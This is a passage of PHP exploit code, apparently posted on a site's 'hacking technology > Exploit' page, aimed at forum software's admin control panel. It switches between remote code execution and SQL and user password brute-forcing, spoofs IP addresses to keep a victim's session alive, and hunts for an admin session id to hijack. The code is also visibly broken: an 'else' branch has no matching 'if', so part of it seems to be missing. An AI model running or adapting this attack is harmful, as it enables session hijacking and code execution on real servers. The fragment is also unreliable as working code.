# Where do we go ?
switch( $this->p_attack )
{
case 1: $this->code_exec(); break;
case 2: $this->bf_sql_pwd(); break;
case 3: $this->bf_usr_pwd(); break;
default: $this->usage();
}
return;
}
function code_exec($loop=1)
{
# First loop
if( $loop == 1 )
{
$this->set_sql_param();
$this->set_sql_focus();
$this->p_acp = $this->get_p('acp');
# ACP path
if( !$this->p_acp )
{
# If the user changed the ACP directory, we can
# find it (if the "Remove ACP Link" option was not
# applied) by log in as an Admin, and then click
# on "Admin CP". This can be done with a user
# but I didn't implemented that ;)
$this->msg('Using default ACP path: admin', 1);
$this->p_acp = 'admin';
}
else
$this->msg('Using ACP path "'.$this->p_acp.'"', 1);
# Init client headers:
# Only if we have the same IP as the targeted user (not admin),
# it resets session datas, so we try to spoof our
# IP as a random one in order to keep user's session datas while
# we bruteforce SQL fields.
$this->bypass_matches();
# Remove expired sessions ( time() - 60*60*2 = > 2 hours )
$this->web->get($this->p_url.$this->p_acp.'/index.php?');
$this->msg('Removed all out of date admin sessions', 1);
# Cookie prefix
$this->get_cprefix();
}
# Admin session ?
$this->msg('Trying to find an admin session id', 0);
# F0ck
else
{
$this->msg('No user session id found', -1);
$this->msg('Admin session > 2 hours or user logged out', 0);
$this->msg('Keeping trying until the user connects', 0);
$this->msg('Entering loop #'.$loop.' ...', 0);
$this->code_exec(++$loop);
}
}
You are here: hacking technology
> Exploit
> Content
Category: Home
> Exploit